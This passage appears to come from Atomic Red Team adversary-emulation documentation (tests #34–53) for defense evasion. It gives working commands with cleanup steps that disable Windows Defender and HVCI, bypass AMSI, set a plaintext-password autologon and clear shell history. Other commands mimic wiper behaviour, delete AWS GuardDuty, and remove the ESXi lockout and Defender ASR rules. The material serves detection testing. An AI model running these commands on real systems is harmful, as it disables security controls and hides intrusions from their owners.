reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
Atomic Test #34 - LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
LockBit Black - Disable Privacy Settings Experience Using Registry
Supported Platforms: windows
auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 1 -Force
Cleanup Commands:
1
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
Lockbit Black - Use Registry Editor to turn on automatic logon
Supported Platforms: windows
auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Value password1 -Force
Cleanup Commands:
1
2
3
4
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. This method will remove Defender and it's packages. Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
Supported Platforms: windows
auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder
The following Atomic will attempt to exclude a folder within Defender leveraging WMI Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Supported Platforms: windows
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
Cleanup Commands:
1
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
Atomic Test #38 - Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.
Supported Platforms: windows
auto_generated_guid: 4b841aa1-0d05-4b32-bbe7-7564346e7c76
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
4
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )
Cleanup Commands:
1
2
3
4
schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
Dependencies: Run with command_prompt!
Description: The Windows Defender scheduled tasks must be backed up first
Check Prereq Commands:
1
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 )
Get Prereq Commands:
1
2
3
4
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
Atomic Test #39 - Clear History
Clear Shell History. This technique only affect the bash shell application.
Supported Platforms: linux
auto_generated_guid: 23b88394-091b-4968-a42d-fb8076992443
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
history -c
Atomic Test #40 - Suspend History
suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
Supported Platforms: linux
auto_generated_guid: 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
set +o history
Cleanup Commands:
1
set -o history
Atomic Test #41 - Reboot Linux Host via Kernel System Request
reboot system via system request seen in Awfulshred wiper.
Supported Platforms: linux
auto_generated_guid: 6d6d3154-1a52-4d1a-9d51-92ab8148b32e
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
echo 1> /proc/sys/kernel/sysrq
echo b> /proc/sysrq-trigger
Atomic Test #42 - Clear Pagging Cache
clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
Supported Platforms: linux
auto_generated_guid: f790927b-ea85-4a16-b7b2-7eb44176a510
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches
Atomic Test #43 - Disable Memory Swap
disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
Supported Platforms: linux
auto_generated_guid: e74e4c63-6fde-4ad2-9ee8-21c3a1733114
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
4
swapon -a
sleep 2
swapoff -a
sync
Cleanup Commands:
1
2
3
swapon -a
sleep 2
sync
Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0". The pre-req needs to be ran in order to setup HVCI and have it enabled. We do not recommend running this in production. Black Lotus Campaign Microsoft
Supported Platforms: windows
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
Cleanup Commands:
1
2
3
4
5
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
Dependencies: Run with powershell!
Description: HVCI must be enabled
Check Prereq Commands:
1
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
4
5
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
Atomic Test #45 - AMSI Bypass - Override AMSI via COM
With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist. This is currently being used by AsyncRAT and others. https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
Supported Platforms: windows
auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
Cleanup Commands:
1
REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
Atomic Test #46 - AWS - GuardDuty Suspension or Deletion
Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.
Supported Platforms: iaas:aws
auto_generated_guid: 11e65d8d-e7e4-470e-a3ff-82bc56ad938e
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
region | Name of the specified region | string | us-east-1 |
Attack Commands: Run with bash!
1
2
3
detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
Cleanup Commands:
1
echo "If test successfully ran, no cleanup required."
Dependencies: Run with bash!
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
Atomic Test #47 - Tamper with Defender ATP on Linux/MacOS
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
Supported Platforms: linux,macos
auto_generated_guid: 40074085-dbc8-492b-90a3-11bcfc52fda8
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
sudo mdatp config real-time-protection --value disabled
Cleanup Commands:
1
sudo mdatp config real-time-protection --value enabled
Atomic Test #48 - Tamper with Windows Defender Registry - Reg.exe
Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
Supported Platforms: windows
auto_generated_guid: 1f6743da-6ecc-4a93-b03f-dc357e4b313f
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
Cleanup Commands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
Atomic Test #49 - Tamper with Windows Defender Registry - Powershell
Disable Windows Defender by tampering with windows defender registry through powershell
Supported Platforms: windows
auto_generated_guid: a72cfef8-d252-48b3-b292-635d332625c3
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 0
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 0
Cleanup Commands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 1
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
Atomic Test #50 - ESXi - Disable Account Lockout Policy via PowerCLI
An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
Supported Platforms: linux
auto_generated_guid: 091a6290-cd29-41cb-81ea-b12f133c66cb
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
vm_host | Specify the host name of the ESXi Server | string | atomic.local |
vm_user | Specify the privilege user account on ESXi Server | string | root |
vm_pass | Specify the privilege user password on ESXi Server | string | pass |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false
Disconnect-VIServer -Confirm:$false
Dependencies: Run with powershell!
Description: Check if VMWARE PowerCLI PowerShell Module is installed.
Check Prereq Commands:
1
2
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
Get Prereq Commands:
1
Install-Module -Name VMware.PowerCLI -Confirm:$false
Atomic Test #51 - Delete Microsoft Defender ASR Rules - InTune
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
Supported Platforms: windows
auto_generated_guid: eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$registryValueName = "ASRRules"
if (Test-Path "$registryPath\$registryValueName") {
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
} else {
New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
Write-Host "Registry value created: $registryValueName"
}
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
Atomic Test #52 - Delete Microsoft Defender ASR Rules - GPO
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
Supported Platforms: windows
auto_generated_guid: 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
$newValueData = "1"
New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
Write-Host "Registry value created: $newValueName with data $newValueData"
Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
Atomic Test #53 - AMSI Bypass - Create AMSIEnable Reg Key
Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0. Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
Supported Platforms: windows
auto_generated_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null
Cleanup Commands:
1
Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null